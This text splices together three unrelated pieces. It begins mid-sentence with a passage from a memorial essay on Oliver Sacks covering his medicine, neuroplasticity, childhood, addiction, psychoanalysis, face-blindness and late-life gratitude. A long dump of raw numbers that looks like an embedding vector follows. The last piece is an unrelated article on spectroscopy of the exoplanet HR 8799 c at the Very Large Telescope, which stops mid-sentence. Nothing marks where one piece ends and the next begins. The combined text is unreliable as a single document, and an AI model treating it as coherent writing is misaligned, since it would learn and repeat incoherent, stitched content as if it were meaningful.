"user" and provider" masks the fundamental insight in the word "patient." When we are truly sick, we are suffering, dependent, and not wholly ourselves. We require a "healer" (which comes from the old English haelan, which means not simply to "cure" but to "make whole"). We require not just a provider of goods and services but also a relationship we can trust. Our remote, obfuscating language is a pathetic replacement for a vanishing, highly personal healer-patient relationship, an ancient archetype that is being buried. People can feel stripped of their dignity, autonomy and personhood on entering such user-provider "systems." The logistical demands of those systems, along with the presence of devices such as computers, can directly intrude into the doctor-patient relationship. Physicians, compelled by numerous pressures from the "health-care efficiency experts," must spend as much time looking at their screens during eight-minute visits as at their patients. Increasingly, clinics and hospitals treat clinicians as interchangeable "service providers." Once we enter such a system, to make up for the loss of my doctor or my nurse, we are assured we now have something better: "the team." Doctors and nurses may come and go, but the team will always be there. But will a team with interchangeable members we may barely know really have our back in a crisis, really care about us, as much as someone with whom we have an ongoing relationship? All this systems-oriented care – an oxymoron – is not simply the product of underfunding health care. It occurs in nations rich and poor, capitalist and socialist. Rather, it grows out of a paradigm that sees the world of illness and health solely in material, analytical, statistical and technological terms. Against this, how we long for an old-fashioned, irreplaceable Dr. Sacks, taking call every night, with his two-hour assessments of "his" patients. For in a world in which the doctor is too easily replaced, so too, we sense, is the patient. Dr. Sacks seeing patients at Beth Abraham, 1988. The Man Who Mistook His Wife for a Hat (1985) was based on the prevailing view of its time, one built up over the 19th and most of the 20th centuries, that the brain was made up of several hundred little "organs," each of which had a genetically preassigned task. The adult brain was fixed. The great triumph of that era of neurology and neuroscience was to begin to map the brain, localizing where each of these areas were. Hat gave readers a first tour through these little organs, while also describing the human drama of how these patients were affected by their malfunctions and misfortunes. These were stories, as Dr. Sacks saw it, of patients who either lost their identity because of a brain lesion, or who triumphed and found a way to preserve that identity. In the late 1980s, however, neuroscience underwent a major shift. With the increasing recognition of neuroplasticity – the discovery that even the adult brain's physical structure is adaptable and can change in response to experience – Dr. Sacks realized that Hat was based on a partially outmoded view of the brain. Clinically, he was beginning to observe that neuroplasticity was at work in people with neurological disease, as they adjusted to their illnesses. In his book An Anthropologist on Mars (1995), he showed how, owing to "the brain's remarkable plasticity," illness could even "play a paradoxical role, by bringing out latent powers, developments, evolutions, forms of life, that might never be seen, or even be imaginable, in their absence." To learn of these evolutions, he left his office and spent time with patients as they worked, travelled, and lived their lives. He explored savant-like skills in autistic people; how tumours or strokes might give rise to new ways of seeing the world. No longer was Dr. Sacks seeing his suffering patients as either losing their identity, or preserving it; these were instead all stories of the metamorphosis of identity. In most of the cases, he made sophisticated psychoanalytic observations about how the mental life and the neurological problems interacted, pushing for a more holistic neurology. Dr. Sacks used his understanding of plasticity not to try to cure, alter or improve the people he was writing about. His purpose was to understand, to appreciate, how the human spirit changed in response to brain changes. Anthropologist is the book where Dr. Sacks achieves staggering heights, and shows he has no peer. I know of no better, more subtly observed, eye-opening case histories in 20th-century neurology. Dr. Sacks writing on a car roof. I met Oliver Dr. Sacks only once, in the spring of 2008. Zarela Martinez, a dynamic New York restaurateur, was the author of a book on the food and life of her native Oaxaca. Oliver had written Oaxaca Journal, his own exploration of southern Mexico, especially its ferns (he was an amateur pteridologist), and when he learned of Zarela, he showed up at her restaurant one day, asking her to autograph his copy of her book. A friendship ensued. Some time later Zarela contacted me: Coming across Dr. Sacks's endorsement of my first book, she had bought it, and then got in touch because she was using some of the neuroplasticity principles I described to help minimize the onslaught of her own Parkinson's symptoms. Upon learning that Oliver and I had never met, Zarela became excited ("Another excuse for a party!") and organized a small dinner at her house. It was intimate, with my wife, Karen; Zarela; her partner, Jamie (a retired adult-film actor); Oliver; James Watson, the Nobel laureate and co-discoverer of DNA; and Dr. Watson's wife, Liz. I had previously dined with Francis Crick, of Watson and Crick, and Dr. Sacks had been close with Dr. Crick, but neither of us had ever met Dr. Watson until that evening. This assortment of guests was typical of a Zarela get-together, and comfortable for Dr. Sacks: His own eclectic circle could bring together an astronaut, a dental hygienist, a fern expert, a car dealer, several Nobel laureates, and the person who scrubbed his floors. She sat Oliver and me together. I wanted to thank him for what his writings meant to me, and for what he had done for me personally. When the manuscript of my first book was complete, it was sent out to many people for comment. He was the only one to respond, remarkable in a man with so many demands on his time. (I say this as someone who has not always managed to do the same for others myself.) I expressed my heartfelt gratitude; he was warm, but self-minimizing, in a British way. As we dug into the dinner, and discussed current projects, the naturalist emerged. He discoursed, like a botanist, on our salad, but not all vegetables, I learned, were equal: He had a particular passion for radishes, and he carefully singled them out from the other, leafy things on his plate. He was, I had been told by a colleague who studied with him as a resident, painfully shy, and I remember, more than anything, the slowly unfolding pace of our conversation. He spoke softly, was attentive, tactful, gentle, and utterly unlike some of the wound-up wordsmiths and intellectuals from the brilliant Oxford set of his university days. We settled into our orbit, found our range and roster of shared interests, and the conversation proceeded from a mutual interest in Russian literature (he raised Oblomov, the lead character in Ivan Goncherov's novel, about a man who got nothing done), to Dr. Luria and mutual professional challenges, including keeping up with correspondence. Dr. Sacks received thousands of letters. "The worst," he said, with distress, "are those who write hoping for magic." Toward the end of the evening, he told me, with some pride and tenderness, and in a nod to the fact that I was also a psychoanalyst, that he had to go, because he had an appointment with his own analyst in the morning. "We've been seeing each other for a long time." Lifting weights as a novice at the Maccabi club in London, 1956. Oliver Sacks had a good start in life, born in London to a loving, Orthodox Jewish family, immediately followed by a very traumatic childhood, which he wrote about in a first memoir, Uncle Tungsten: Memories of a Chemical Boyhood (2001). During the Nazi bombing of London, six-year-old Oliver was evacuated, with his brother, to a boarding school called Braefield, in the Midlands. The headmaster beat all the boys; he beat Oliver on his bottom till the cane broke, and sent Oliver's parents the bill for the cane. The older boys soon beat the youngest among them. He was often hungry, and survived mostly on turnips and coarse beetroots for cattle, because the matron stole the food parcels his parents sent. His parents, both physicians, busy in London with war duties, could only rarely visit. In the four years he was a student at Braefield, he was allowed to visit home only once. He felt abandoned, betrayed, desolate and hopeless. His belief in God was shaken. "He always said," Kate Edgar, Dr. Sacks's assistant and close friend, told me, "that the exile to boarding school was the major wound in his life." To survive Braefield, Oliver took refuge in numbers, thinking about them, manipulating them, exploring mathematical relationships. When the war ended, this evolved into an interest in chemistry. He also went from being a well-behaved child to acting out – he came home utterly changed. When he wasn't replicating the major experiments of modern chemistry, he loved making explosions and noxious gases ("bangs and stinks," as he called them). His teacher wrote in his school report, "Sacks will go far, if he doesn't go too far." As an adolescent, he became a serious motorcyclist. The mild-mannered man I dined with wrote, "I cannot say (nor would anyone who knows me say) that I am a man of mild disposition. On the contrary, I am a man of vehement disposition, and extreme immoderation in all my passions." Braefield was not the only agony from his youth. When he was 18, Oliver, questioned by his father, acknowledged that he had sexual feelings for boys. "Don't tell Ma," Oliver said, "she won't be able to take it." His father did tell her, though, and when she saw Oliver, she said, "You are an abomination. I wish you had never been born." It was never discussed again. He later wrote, "My mother, so open and supportive in most ways, was harsh and inflexible in this area." It was, probably, all the more agonizing because his relationship with her remained, until she died, his most important. As he wrote in On the Move, "My mother's death was the most devastating loss of my life – the loss of the deepest and perhaps, in some sense, the realest relation of my life." Ultimately, he was forgiving. "We are all creatures of our upbringings, our cultures, our times. And I have needed to remind myself, repeatedly, that my mother was born in the 1890s, and had an Orthodox upbringing and that in England in the 1950s homosexual behaviour was treated not only as a perversion but as a criminal offence." Torn by conflicted feelings, Oliver had to lead a furtive romantic life through his 20s, when he had several love affairs. Oliver Sacks with his new 250cc Norton motorbike in 1956. Oliver became a combination of an intellectual and a renegade. He studied medicine in Britain and then made his way to North America, crisscrossing the continent on a motorcycle, and getting into some dangerous accidents. He briefly spent some time hanging out with Hells Angels, biked across Canada, and tried to sign up as a pilot with the Royal Canadian Air Force. He later moved to California, where he set a state-wide weightlifting record, and also began a medical residency in neurology. At the end of work on Friday, he'd exchange his white coat for leathers, and the "Wolf" (his middle name) would come out, wanting speed, adventure, risk and novelty, and he'd ride his motorcycle, sometimes all night, to the Grand Canyon, to catch the sunrise. He'd ride back all Sunday night, for medical rounds Monday morning. Arriving in the United States, in the 1960s, his deep interest in both chemistry and the mind drew him to try many different kinds of mind-altering drugs. Many of his weightlifting friends used speed and he did, too. Driving his use was deep emotional distress: His drug use escalated after a soured love affair. "I craved some deeper connection – 'meaning' – in my life, and it was the absence of this, I think, that drew me into near-suicidal addiction to amphetamines … " By this point many of Dr. Sacks's friends had died on amphetamines. He was, often, "half-psychotic" and emaciated. One New Year's Eve, high on the drug, he had a lucid moment: "Oliver, you will not see another New Year's Day, unless you get help." Dr. Sacks started undergoing psychoanalysis in 1966, "knowing I would not survive without help." Stoned much of the time, he realized Dr. Leonard Shengold, his analyst, could both pierce his defences, and "not be deflected by my glibness." Dr. Shengold got him off drugs, so the real analytic work could begin, and taught him "about paying attention, listening, to what lies beyond consciousness or words." Dr. Sacks wrote of his analysis, "I think it saved my life many times over." Verbatim: Oliver Sacks on his experience with drug use One of the most remarkable things about Oliver is that, though he is known as such a deeply sensitive writer and person, it was not always so. Among his friends was poet Thom Gunn; they often exchanged manuscripts. After praising a draft of Awakenings, Mr. Gunn felt he could now reveal his true feelings about Dr. Sacks's early diary writings, and wrote to him: "I found you so talented, but so deficient in one quality – just the most important quality – call it humanity, or sympathy, or something like that. And, frankly, I despaired of your ever becoming a good writer, because I didn't see how one could be taught such a quality. … Your deficiency of empathy made for a limitation of your observation. … What was deficient in these writings is now the supreme organizer of Awakenings … I wonder if you know what happened." He had learned to empathize. Dr. Sacks was thrilled by the letter, and spent a long time pondering how he had changed. Was it that he had fallen in and out of love? Was it his attachment to his patients? Or a drug experience that opened him up to great empathy? He concluded that "psychoanalysis had played a crucial role in allowing me to develop." People in analysis frequently do develop more empathy for others, by several circuitous routes. Most commonly, they learn which of their own disowned, repudiated or repressed feelings they routinely project onto others. Once these projections are cleared away, they can actually take a far better look at others, and determine what they may be feeling. As well, people who have undergone long-term, severe traumas survive them by cutting off their own feelings – dissociating them, and becoming numbed – or by forgetting. One thing Dr. Sacks unearthed during his analysis, for instance: His parents did visit him at Braefield, though he had no memories of it. Dr. Sacks had another unusual problem, one that he believed underlay his shyness, but that may well have affected his ability to empathize: a rare neurological condition called "face-blindness" (technically, congenital prosopagnosia). It meant that the processor in his brain that normally analyzes differences between faces never developed properly. Throughout his life, he could not recognize acquaintances or friends. Dr. Sacks's face-blindness was profound. Once, he apologized for bumping into a large, bearded man, only to recognize that the man was himself in a mirror. Another time, he began preening himself in front of a mirror, only to realize that the bearded reflection he was staring at wasn't a mirror image at all, but another, now rather confused man. At times he misinterpreted facial expressions and gestures, sometimes endearingly. Once, when he was lecturing too long, Ms. Edgar, from the wings, repeatedly drew her finger across her throat. He thought she was signalling to him that her chin was bleeding. Children learn to empathize in large part by recognizing the facial expressions of others. Two areas of the brain, right-hemisphere circuits (which have strong ties to the emotional processors of the brain) and the brain's facial-recognition circuitry, allow us to read people's expressions, and hence their emotions, and even to understand and control our own emotions. We now know that, with various targeted brain exercises, these areas, if compromised, can sometimes be developed with incremental exercise. I wonder whether face-blindness may well have contributed not only to his shyness, but to the lack of empathy that existed in his earlier life. Edit video Verbatim: Oliver Sacks on face-blindness Dr. Sacks, for reasons he does not explain in his memoir, remained celibate for over three decades. But when he was 75 years old, he writes, "I met someone I liked. … Timid and inhibited all my life, I let a friendship and intimacy grow between us, perhaps without fully realizing its depth." He and the writer Billy Hayes fell in love. The relationship was in full bloom when Oliver was 77, a redemptive gift of old age. "It has sometimes seemed to me that I have lived at a certain distance from life. This changed when Billy and I fell in love. … [T]he habits of a lifetime's solitude, and a sort of implicit selfishness and self- absorption, had to change." Another gift of old age was a form of healing with his family. Though Dr. Sacks had many family members in Israel, who fled there after the Second World War (his cousin Abba Eban was Israel's eloquent deputy prime minister in the mid-sixties), he had not visited since he was 22. Oliver had long felt he would be uncomfortable in a deeply religious society. In an interview, he had once described himself as "an old Jewish atheist," a telling phrase, because one would think that being an atheist would disqualify one from identifying with one's original religion. But with Dr. Sacks, truth lay in the particular, the historical and the evolutionary. In 2014, he finally returned to Israel, to mark the hundredth birthday of a relative. While there, he visited his cousin Robert John Aumann, with whom he had become close in the 1990s. Dr. Aumann was a powerful, athletic man of great warmth and had a huge white beard that made him "look like an ancient sage." A mathematician and rationalist, he had won the Nobel Prize in economics. He was also an Orthodox Jew, and would take his almost 30 children and grandchildren skiing at once, packing kosher plates for them all. He loved to champion the Sabbath's peace, beauty, and what Dr. Dr. Sacks described as its "remoteness from worldy concerns." "I had felt a little fearful visiting my Orthodox family with my lover, Billy – my mother's words still echoed in my mind – but Billy, too, was warmly received," Dr. Sacks wrote. "How profoundly attitudes had changed, even among the Orthodox, was made clear by Robert John when he invited Billy and me to join him and his family at their opening Sabbath meal." Dr. Sacks continued: "The peace of the Sabbath, of a stopped world, a time outside time, was palpable, infused everything, and I found myself drenched with a wistfulness, something akin to nostalgia, wondering what if: What if A and B and C had been different? What sort of person might I have been? What sort of life might I have lived?" Shortly after that, he completed his memoir, On the Move, glad he had been able "for the first time in my life, to make a full and frank declaration of my sexuality, facing the world openly, with no more guilty secrets locked up inside me." At Blue Mountain Center, 2010. The art of dying is not learned on the deathbed. These things, in Oliver Sacks, it seems to me, are all of a piece: his love, since he was a boy, of the close study of particulars in nature; his joyful wonder, and insatiable curiosity; his fascination for the colours orange and indigo, for cephalopods, cycads, metals and chemicals, numbers, ferns, and radishes, invertebrates, all kinds of brains; his ability to see in destitute patients with bizarre, odd, uncanny, problems, their full humanity; his generosity to other, younger authors and scientists; his ability to begin to love late in life, and forgive those he had long loved; and the gratitude, and serenity, that he was able to express, even as he was dying. They are all manifestations of the appreciative sense. Gratitude is an alloy: part attitude, part feeling. It is a philosophical emotion, the product of taking stock. When someone gives us something and we are appreciative, we are grateful for it, but also for our relationship with them. There is also some humility in being truly grateful. In expressing our thanks, we acknowledge our incompleteness, by expressing our debt to our benefactor. But to whom or what does the atheist, if he feels thankful for his life as a whole, feel grateful? This is not easy to answer, if one believes that our lives are a product of chance, and molecules in motion. Somehow, Dr. Sacks seems never to have believed that the random picture that our science, in its current form, paints of the world, need give rise to a disenchanted, nihilistic picture of life as profane. I was once struck by an incongruity reading his description of a trip to the Arizona desert with the autistic artist Stephen Wiltshire. They had spent an afternoon in the Canyon de Chelly, with a Navajo artist who showed them "a special sacred vantage point" from which to draw. Both began drawing, while the Navajo artist told Mr. Wiltshire all the myths of that place. But "Stephen was indifferent to all this," wrote Dr. Sacks. Yet when they were done, Mr. Wiltshire's drawing was far better, and "seemed (even to the Navajo artist) to communicate the strange mystery and sacredness of the place. Stephen himself seems almost devoid of any spiritual feeling; nonetheless he had caught … the physical expression of what we, the rest of us, call the 'sacred.' " Dr. Sacks could have written that Mr. Wiltshire had captured the "beauty," or what was "precious" in the scene, or even its "wondrous," or "mysterious," "awe-inspiring" nature. But he insisted he caught the sacredness of it, a religious category if ever there was one. This paradox – the depiction of a sacred world, while feeling oneself devoid of spiritual feeling or conviction – may well have applied to Dr. Sacks himself, and indeed may apply to many of us. We want to believe that the planet, life, nature, our loved ones are sacred, but at the same time we do not accept the mystical premises of religions, which are the sources of ideas of the sacred. Ransack the theories of modern science, and you will find many categories, but the sacred-profane distinction will not be among them. The universe, we are told, is composed of matter in purposeless motion, governed in large part by chance. The idea that life has a design, and organisms a teleology, or end, became suspect, of course, with Dr. Sacks's hero, Charles Darwin. Evolution is opportunistic, and emerges from a series of chemical accidents producing random mutations; it is not toward some end, as was believed by Aristotle, pre-Darwinian science, and of course many religions. Yet many of us live with the two, with the scientific and the sacred, both at once. And perhaps one of the reasons Dr. Sacks's work has such a strong appeal is that, despite his being a champion of modern science, he approached his patients' lives, life and nature with a reverence that treats them as almost sacred, and this appeals particularly to those of a modern, secular cast of mind. It appeals, precisely because the premise that we are nothing but molecules in random motion so disenchants the universe for us, and leaves us feeling longing for more. It is a disenchantment that is hard for even the hardheaded scientist to tolerate; we prefer our nihilism without too deep an abyss. It is not enough to wonder about the mystery; we make it sacred, too. And we long for thinkers like Dr. Sacks, who remind us that science is about wonder, and who, by so doing, hint that perhaps the idea that we are merely matter in motion is just part of the story, but not the whole story. His emphasis on wonder reminds us that science is about opening, not just closing, questions. Why is gratitude of such great magnitude so rare? Perhaps because gratitude does not always go unopposed. Psychoanalysts have often seen gratitude as having an emotional opposite, envy. Sometimes a flash of envy can be a helpful sign, a spur that tells you, "You know, you really want this – try for it." But very often, the envious person sees something wonderful in the world, and instead of appreciating it, attempts to make the envious feeling go away, by devaluing or denying its worth (those grapes were sour, anyway); or he or she may try to spoil or destroy the envied object in reality. If one does this enough, one ends up feeling starved, because one finds oneself living in an emptied world. Envy destroys the possibility of love; confronted by a cherished, idealized object of our affection, envy cannot tolerate the goodness in them, and seeks to destroy them; and envy does so by first undermining any feelings of gratefulness we might have for that person. The envious have a particularly hard time growing old and dying. They cannot tolerate the fact that the young, and not they, have their lives before them. They feel pain, and emptiness. We speak of people being consumed with envy – but filled with gratitude. It's paradoxical that, by acknowledging that there are wonderful things in the world, and that we are incomplete, we can feel filled up – even as we bid the world farewell. Ms. Edgar told me that her atheist friend sometimes liked to be read, of all things, the Bible. When I think of Oliver's last days, I think of a biblical sentence that I've always found instructive in the twofold art of living and dying. It reads, "And Abraham died … full of years." Not emptied of them; filled by them. Norman Doidge, MD, is is the author of The Brain That Changes Itself and of the just-released expanded paperback edition of The Brain's Way of Healing. MORE FROM THE GLOBE AND MAIL Jean Vanier's comfort and joy: 'What we have to do is find the places of hope' Jean Vanier created L’Arche – a unique community for mentally disabled adults – to nurture a different kind of life: one focused on connection rather than commerce. More than 50 years later, Ian Brown went on a journey to understand how simply admitting our weaknesses can make us strong.
[ -0.029151471331715584, 0.005748061463236809, 0.03904977813363075, 0.06081362068653107, 0.021433334797620773, 0.00023806036915630102, 0.09100700914859772, 0.11294978857040405, -0.01593119278550148, -0.038870081305503845, -0.049067143350839615, -0.0003763512650039047, -0.04270106181502342, 0.07863416522741318, -0.06957370042800903, 0.033513423055410385, -0.09084191918373108, -0.06061854958534241, -0.08227680623531342, 0.03243328630924225, -0.09650413691997528, 0.07024424523115158, 0.012125838547945023, 0.01314861886203289, -0.033826395869255066, 0.01476430892944336, -0.11553403735160828, -0.1015831008553505, 0.024253148585557938, 0.053815726190805435, 0.03177252039313316, -0.03185642510652542, -0.027295712381601334, -0.07219620794057846, 0.029497573152184486, 0.008992093615233898, -0.04492102563381195, 0.07681243121623993, -0.07091634720563889, 0.021839473396539688, 0.04489181563258171, -0.11727547645568848, -0.03556698188185692, 0.07736235857009888, 0.036655426025390625, -0.05313416197896004, -0.03947452828288078, -0.09142635017633438, 0.039334699511528015, 0.013072148896753788, -0.12550246715545654, -0.05226769298315048, -0.029873879626393318, -0.025016015395522118, -0.00826258771121502, 0.0143935801461339, 0.01048734039068222, 0.01505852397531271, -0.11437017470598221, -0.010845383629202843, -0.018290458247065544, -0.010369919240474701, 0.016337933018803596, 0.05667101591825485, 0.0473017655313015, 0.02584773674607277, -0.006719214841723442, 0.0008927014423534274, -0.018421199172735214, 0.07205408066511154, 0.013613978400826454, 0.0033452531788498163, 0.003159580286592245, 0.03483441844582558, 0.04338398203253746, 0.002102324040606618, 0.04359054937958717, -0.021973296999931335, 0.09291636198759079, -0.01688050664961338, 0.05193239077925682, 0.08313041180372238, -0.01279139332473278, 0.020485594868659973, -0.06073548272252083, -0.025082698091864586, 0.01588827185332775, -0.05251597985625267, -0.061454713344573975, -0.04152223840355873, 0.003051566192880273, -0.09458894282579422, 0.0174120981246233, 0.05565940588712692, 0.02291150577366352, 0.026338845491409302, -0.011493225581943989, -0.028236744925379753, -0.08737140893936157, 0.028655247762799263, -0.007617630064487457, -0.007417750079184771, 0.017076950520277023, 0.038381777703762054, 0.07670901715755463, -0.020801834762096405, -0.04264449700713158, -0.02411770448088646, -0.0324590839445591, 0.019598178565502167, 0.01567741297185421, -0.0006091680843383074, 0.04368124529719353, -0.01735350675880909, 0.0791887417435646, 0.09981336444616318, -0.13052095472812653, 0.06094128638505936, 0.020930565893650055, 0.0567304752767086, -0.030702948570251465, 0.03279779478907585, 0.013446775265038013, -0.022320253774523735, 0.040258318185806274, 0.00527863809838891, 0.05034199729561806, 2.156071534469085e-33, 0.09176024049520493, -0.0340404137969017, 0.03529341146349907, 0.09916304796934128, 0.04334823042154312, -0.017680812627077103, -0.06590305268764496, -0.022418377920985222, 0.03526785969734192, 0.014163478277623653, 0.03234656900167465, -0.02027192711830139, 0.025162475183606148, 0.02889266610145569, -0.12513962388038635, 0.03543344885110855, -0.05013855919241905, -0.022216951474547386, -0.04209962114691734, 0.04591222479939461, 0.0052646491676568985, 0.02193388342857361, 0.0035935775376856327, -0.06974334269762039, -0.03170362114906311, 0.0009124262724071741, -0.09374380111694336, -0.02179800719022751, 0.04547871649265289, 0.017563851550221443, -0.13339290022850037, 0.07259225845336914, -0.031031401827931404, -0.049985818564891815, -0.06458903849124908, -0.05559837445616722, -0.03907597437500954, -0.031152259558439255, 0.0037390515208244324, 0.02095179818570614, 0.04903276637196541, 0.08351711928844452, 0.007069471757858992, -0.05782317370176315, -0.00860072486102581, -0.0067121065221726894, 0.08557697385549545, -0.013064725324511528, 0.0011453881161287427, -0.055816713720560074, 0.004954482428729534, -0.004923132713884115, 0.01562348660081625, -0.031279049813747406, 0.047114696353673935, 0.00256531685590744, -0.006671149283647537, 0.07729633897542953, 0.04186365008354187, -0.007763638161122799, 0.1666647493839264, 0.05254368484020233, -0.0322875939309597, 0.089019775390625, 0.01287933625280857, -0.0632861852645874, 0.010263962671160698, -0.07692696154117584, -0.07911442220211029, -0.029018066823482513, -0.033427681773900986, 0.04892336204648018, -0.09397191554307938, -0.09606656432151794, -0.04903077706694603, -0.03522661700844765, 0.09228496998548508, -0.048739511519670486, -0.08769301325082779, -0.0021745339035987854, 0.08525299280881882, 0.03624873608350754, -0.051749106496572495, -0.017538152635097504, 0.028201965615153313, 0.04282239452004433, -0.0041974796913564205, -0.05629276856780052, -0.010623268783092499, 0.009669489227235317, 0.010830692946910858, 0.011356745846569538, 0.05585840344429016, -0.1191244125366211, -0.1049521341919899, -3.352466174848993e-33, -0.02068743109703064, -0.03342829644680023, 0.05475703254342079, -0.0021589677780866623, 0.031794048845767975, -0.01259919535368681, -0.05073750764131546, 0.06702002137899399, 0.05228090286254883, 0.05735952407121658, 0.012812717817723751, 0.06786269694566727, -0.009146700613200665, 0.01780015230178833, -0.0651715099811554, -0.06116268411278725, -0.12413530796766281, -0.05842558667063713, -0.02770947478711605, -0.008829707279801369, 0.03358977660536766, 0.0809333547949791, -0.10526169836521149, -0.023461123928427696, -0.012070007622241974, 0.06722467392683029, 0.028348982334136963, 0.04004577547311783, -0.06193383410573006, -0.12394899874925613, -0.010895336978137493, 0.04919709637761116, -0.09499165415763855, -0.002559831365942955, -0.0019328473135828972, 0.030533550307154655, 0.015117214061319828, -0.07578428089618683, -0.06809485703706741, -0.028425341472029686, 0.019458631053566933, -0.007019098848104477, 0.028178898617625237, -0.04247327893972397, 0.05199476704001427, -0.070498026907444, -0.10972265154123306, -0.035413436591625214, 0.059905555099248886, 0.05969599261879921, -0.04565972834825516, 0.019247714430093765, -0.07213878631591797, 0.044093552976846695, 0.007522078230977058, 0.0036813567858189344, -0.05746704712510109, -0.0516451857984066, 0.05298399552702904, -0.03976201266050339, 0.002820980502292514, -0.01885870471596718, -0.08772517740726471, -0.023189092054963112, -0.005319654941558838, 0.07201959937810898, 0.02609284222126007, 0.028668727725744247, -0.029861386865377426, 0.012025804258883, -0.009916240349411964, -0.0032985268626362085, -0.044043902307748795, -0.08073106408119202, 0.058057621121406555, 0.10680738836526871, 0.0028407240752130747, -0.05192973092198372, 0.021846888586878777, -0.015727238729596138, 0.0162995383143425, -0.09318971633911133, 0.04520126059651375, 0.0404098741710186, -0.01232814695686102, 0.024813173338770866, -0.03885314241051674, -0.0012523786863312125, 0.011820840649306774, 0.0005646823556162417, 0.05785664916038513, -0.04016820341348648, -0.008946104906499386, 0.05311926081776619, -0.05233976989984512, -6.228006554920285e-8, 0.007231235504150391, -0.029373357072472572, -0.05172906443476677, -0.002600065665319562, 0.04377475008368492, -0.03526689484715462, 0.021106399595737457, -0.04986654594540596, -0.005539799574762583, 0.13186952471733093, -0.027255704626441002, 0.016330325976014137, -0.05365537852048874, 0.038552410900592804, 0.03966283053159714, 0.02586277388036251, -0.0086029302328825, 0.0604616180062294, -0.029157936573028564, -0.007642047479748726, 0.057105738669633865, 0.02709505334496498, 0.035009995102882385, -0.022265935316681862, -0.0034176865592598915, -0.021113844588398933, -0.02719356119632721, 0.005229398142546415, -0.04858427867293358, -0.007145815994590521, 0.027302440255880356, 0.06652592122554779, 0.009040465578436852, 0.011190210469067097, 0.013920175842940807, -0.05199047923088074, 0.10122450441122055, -0.025509562343358994, -0.02086035907268524, 0.06313087046146393, 0.13565081357955933, 0.07455089688301086, 0.05733947083353996, 0.022854072973132133, 0.021192315965890884, -0.0400603748857975, 0.01972915418446064, 0.022781530395150185, 0.005095729138702154, -0.021207429468631744, 0.024150677025318146, 0.0019055198645219207, 0.0669565200805664, 0.0627954825758934, -0.026146743446588516, 0.022968536242842674, -0.01149037666618824, 0.084354929625988, -0.06608051061630249, 0.031611036509275436, 0.0042905318550765514, 0.0043186284601688385, 0.03786328807473183, 0.016970504075288773 ]
Its atmosphere is stiflingly hot, with temperatures generally hovering around 800 degrees Celsius (1,470 degrees Fahrenheit) -- in the shade. The air is filled with billowing clouds of highly toxic gas. Anyone setting foot on this faraway planet would die a speedy death. Nevertheless, the recently launched study of HR 8799 c is a breakthrough in the search for extraterrestrial life. Astronomers unveiled a groundbreaking achievement in the field of metrology last week. By measuring the spectrum of light coming from HR 8799 c, they have managed to determine the chemical composition of its atmosphere. "For the first time, we have directly obtained the spectrum of a planet outside our solar system," says study co-author Wolfgang Brandner of the Max Planck Institute for Astronomy in Heidelberg. Nowadays, the discovery of planets outside our solar system has become practically routine. In recent years, scientists have discovered more than 400 of these so-called exoplanets. But in most cases, their existence could only be proven indirectly, for example, by virtue of the fact that they cause a slight weakening in the light emitted by a much brighter star. Mechanical Ballet Only with the help of the world's most advanced observatory, and the European-run "Very Large Telescope" (VLT), did it become possible to directly capture the weak light coming from a planet and analyzing it using spectroscopy. The massive telescope is located on a 2,600-meter (8,528-foot) peak in Chile's Atacama Desert. After nightfall, the robotic eyes come to life on the mountain, known as Cerro Paranal. Four giant domes, as outlandish as the stone sculptures on Easter Island, are silhouetted against the evening sky. The steel giants begin moving almost inaudibly, as the domes, each a 400-ton maze of cables and supports, ladders and steps, perform a mechanical ballet. Each of the VLT's four main mirrors has a diameter of more than eight meters. They are the most sensitive devices designed to peer at the sky ever built by human hands, so powerful that they could pinpoint the light coming from a car headlight on the moon. One of their most important objectives is the search for a second Earth -- and for extraterrestrial life in space. "What we are currently experiencing is the emergence of a new conception of the world," says Michael Sterzik, "comparable to the sea change that occurred when Copernicus described how the earth revolves around the sun." The astrophysicist climbs down the steps of the VLT and locks the door from the outside. His presence would only disturb the images. He is the head of operations at the European Southern Observatory (ESO), which operates the VLT as part of a consortium of 14 European countries. Life in the Universe The Atacama Desert is one of the driest places on the planet, which makes it ideal for obtaining a clear view into outer space. To avoid disturbing the measurements at the observatory, drivers are required to shut off their headlights and crawl, with only their parking lights turned on, up the serpentine access road, which is lined with nothing but reflectors. In October, planet hunter Brandner spent four nights at the observatory to align the telescopes with HR 8799 c. "It is now possible to control many observations via the Internet," he says, "but our project was so experimental that we had to be on-site all the time." The late summer heat is currently shimmering above the giant, artificial eye. The telescope mirrors have to be recoated every 18 months because of the abrasive effect of dust storms. There is no sound of birds singing, and the only sign of life comes from the parched-looking desert plants that claw their way through the gravel. The extremely dry air, with humidity levels that are sometimes lower than 4 percent, burns the eyes and causes the skin to crack open. The reddish, rocky desert around the VLT seems strangely familiar, reminiscent of images taken on Mars, a sterile, desert-like planet. Ironically, it is in this inhospitable place that scientists are searching for life in the universe. A tunnel leads down to the guesthouse, half of which is buried underground to protect against the brutal desert climate. Tanker trucks deliver 55,000 liters of drinking water every day. The building has the futuristic look of a space station. Living on Cerro Paranal is everything but glamorous. The staff works at night and sleeps during the day. The nearest city is several hours away, and alcohol is banned at the facility. Astonishing Results The planet hunters working with Wolfgang Brandner were initially dogged by bad luck. First the sky was overcast, and then moist layers of air obscured the view. It was only during their last night at Cerro Paranal that the scientists were lucky. For five hours, the telescope mirror followed the faraway planet as it moved across the sky in the constellation Pegasus, invisible to the naked eye. After a long night of observation, Brandner had accumulated enough data to produce a portrait of the planet. His team packed their bags, flew home and went to work analyzing the data. The results were astonishing. HR 8799 c is a young, hot giant planet, a cosmic teenager less than 60 million years old and more than 3,000 times as heavy as the Earth. But on Brandner's images, the fiery giant looks more like a tiny, forlorn little dot in space. The planet is 130 light-years away from the Earth, which means that the light being captured today has been traveling since 1880 and has been weakening ever since. "Capturing an image of it was almost impossible, because the star around which the planet revolves is brighter by several orders of magnitude," says Sterzik. "For every particle of light coming from the planet, there are thousands coming from its central star." The astrophysicist likens the challenge to observing a candle burning next to a 300-watt spotlight two kilometers away. The chemical analysis of a hot giant using the VLT has been technically possible for several years, but scientists had not found a suitable object worth observing -- until about a year ago, when a competing team from Canada discovered the promising planetary system that includes HR 8799 c. Evidence of Gas Storms When the ESO researchers analyzed the chemical fingerprint of the young gas giant, they made a surprising discovery: The methane in the gas shield appears to be combined with unusually high levels of carbon monoxide. "Carbon monoxide is normally found only in lower atmospheric layers and is thus invisible to us," Brandner explains. "The fact that we see it around HR 8799 c could mean that there are violent storms raging on the planet." The evidence of gas storms on the giant planet would be an important step in the search for extraterrestrial life forms. It would allow scientists to visualize the weather, climate and even seasons of an exoplanet. But the long-term goal is still to study a small planet with pleasant temperatures that resemble our Earth. Only when scientists are able to discover telltale traces of, for example, ozone or water vapor in the atmosphere of a planet will they have found signs of the 